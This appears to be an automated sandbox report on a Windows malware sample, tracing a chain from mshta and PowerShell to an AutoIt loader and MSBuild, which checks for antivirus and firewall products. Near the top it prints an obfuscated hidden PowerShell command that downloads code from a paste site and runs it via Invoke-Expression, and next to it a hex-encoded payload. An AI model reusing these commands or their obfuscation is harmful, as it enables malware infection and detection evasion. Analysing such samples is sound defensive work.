                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cgmqb($seve){return -split ($seve -replace '..', '0x$& ')};$qbrr = cgmqb('619c354d6db9f3f484d11e37f9a5c98ca2c67ad44869dad2a1b050859a2f64301d2176e5e02553ec057b7defe977761f13ec3b821fd2bf7b61a2835f048aadb9d53ea5090c8a4909936162d4e888edae5c2805a7b7078c416e9eba91a7737860e61cda680064beac6c3b43d4a742cbc7650066b7009f6eed14e649bfe5141bc6820331279b1d91d1afb9a002d60b1142e4ba80436c1acbdf43f77d145a1ae776b79bbdc6b49934e8485ce19389f13ed554b250d9069caaa26c8f20afa47b2981f495265e62e718988b04fbec2faf9362fccfc8295b4ff36fdf66dc47036b18cf402a773f7eb30cf918cc3523247bc946dd3c5116428886f846518591a5473c4029c6021c9d2e4dc7ec2b2f826cb99917ae10c1e8e375c6dd683272b3a957825ddc8cc3e570e90eaf546e09707a8515195ee8896646e1ac066e5bd2875f82393034b362ab91c9724851b205b4a02975e1b921526387ab1ccf8496b8225171653b45d000624d31ebb8a75e93a4faea1da654cbbd9f01209d48530bdf0222a13a588a75e568b18065fa2534b0792938b38475abe2bbfa3d79293144e35126501b0636b6c131b9a7e78357b3cafd6d6ffbfb82f95f053407bd8b91dd016719170a36d88538050ae80a028d7c65871924a588285ab0798b124073a5337b6c7c9f6d791f852f957a88c51cdd5286c788ee800f41905a22d4f3c546eed053c37ca81fac085a0604145517e387f89209637f36cbdfe3efa22d81d023e26b486f415a9f60513e1f044ba938ba37a749a7d64e606f389cea95ede63fe4d4d0b5318e94946b345978b806eb97baa7317f0d66441555cd8b0498cbce4563f27417415532a59009f12d93486baa576d66e1a94c2fcf0aff4d97ff6ac0ded5ae9dd1c28bc9fb4b7b32ebae00e90301c7b10fb256981821ba7d05e59142ed2b63daf46e3f14731a7ee68fda15c0ecb85076d5d3c1627ffecc12a8ab2afa5dcfb028e118d7c7e65f6bddcc94632d5131d101d2d1ad09c79df3500abc5ca72110f7fb629e9784a340da2f69c7ef41790c7ecf578195a0226541aa005b9576c5db3ec2d21e43ad093c6007db20f96d752ddd4cb39bb4b44576d7df95f0dd75240b1b45d12ad14dd1c62d252b89e4c3f6d7ea6db64acd483a82db456666ddb4e66a704027aac5243d0fef1723b6bfba2507b09b620e2e05aeba95c5c15912f9762fe744c407625420e36c579137b8da48e8b2b3d9ceb9ea7d17af1140852299ade0a8b44c9f5b84185e999db924ca89e2381f4c206a8c9aa660f47b148421eb0ba7ebf85a7241c5492982e4137425c91ba9c5dfb91e9ce1808cd8f1a495db03460fa132e80e1b3e0be5a128f98183612928708bd201626624b297a12880537a327369fd4e4910da3fd868cd9ebe5bd79c8442ce12c6c58d0b69ba72e4ed3eaf25028c786f3071cdd15675e2cde5136736e09a963f3819a8e5cd1d162cff51d8a4c10143b9819a2fb97a69508dafc4323924544b31ff36bbafc96f545abece3235e2ffa3205157dd1ebae29cd05bab7a53396acb35f7f234057291f2fd7a472a2618edc0995e36672ac725de56e49af3edf3d49dabeb7c2e83cd39e4a1e4fd35c3ae52263b5ea0b9c94c447fbb37466e6efc8913cdae17bfff7b13ae3dd38f2d855590bf0f8e86c627d41df7ad14a562c3e7585030d97bc4b00d705840832c3e7a736a65b9a5df8180343a6943d342be79d729d85c9670dbba11668a04d31f4257b8ac87e18dd94cace14a949c27e6ccf7b24407ae865a3f706e6c802e46acd0ee5590e5662c7f9e7f0f86445a3d9a74256659eb54c1efab0842363e035766605e44b0a632498b42df7071a7bee137394b4be7714c9295a3bbcbc40acf9ef837543fb9abbbda25577adb9b87b50d5270e313c6d8e4f78f5e0a28f4aa66fc9fefcf3ec4c1ef59ef0fdde684cee62fdcfb62d4eba5Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command cd;set-variable t8 (.(get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'*cm*t'}).name).invoke((get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'g*om*e'}).name).invoke('ne*ct',$true,1))net.webclient);sv s 'https://nopaste.net/sfhgtxfgtb';&(get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'*cm*t'}).name).invoke((get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'g*om*e'}).name).invoke('in*-ex*ion',$true,$true))([string]::join('',(((get-item variable:\t8).value.((((get-item variable:\t8).value|get-member)|where-object{(get-variable _).value.name-ilike'*nl*a'}).name).invoke((gci variable:\s).value)|foreach{(get-item variable:/_).value-as'char'})))) Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_010188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_010188CD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01024F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_01024F1C
                    Source: updater.exe, 0000000E.00000002.1759556958.0000000005C21000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1756660543.0000000001076000.00000002.00000001.01000000.0000000D.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005CFB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: updater.exe, AutoIt3.exeBinary or memory string: Shell_TrayWnd
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q/explorer.exe &*&*& Program Manager &*&*& [WIN]rt-
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerte
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE885B cpuid 14_2_00FE885B
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_015F2ED5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: GetLocaleInfoA,GetACP,14_2_015F93F1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: GetLocaleInfoA,14_2_015F37F9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_015F2FDF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: GetLocaleInfoA,14_2_015F7E59
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: GetLocaleInfoA,14_2_015F7EA5
                    Source: C:\faggbgb\AutoIt3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_01090C2D
                    Source: C:\faggbgb\AutoIt3.exeCode function: GetLocaleInfoA,GetACP,16_2_01097149
                    Source: C:\faggbgb\AutoIt3.exeCode function: GetLocaleInfoA,16_2_01091551
                    Source: C:\faggbgb\AutoIt3.exeCode function: GetLocaleInfoA,16_2_01095BB1
                    Source: C:\faggbgb\AutoIt3.exeCode function: GetLocaleInfoA,16_2_01095BFD
                    Source: C:\faggbgb\AutoIt3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_01090D37
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\faggbgb\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\faggbgb\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\faggbgb\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\faggbgb\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\faggbgb\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\faggbgb\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\faggbgb\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\faggbgb\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01000030 GetLocalTime,__swprintf,14_2_01000030
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01000722 GetUserNameW,14_2_01000722
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,14_2_00FF416A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,14_2_00FD5D13
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
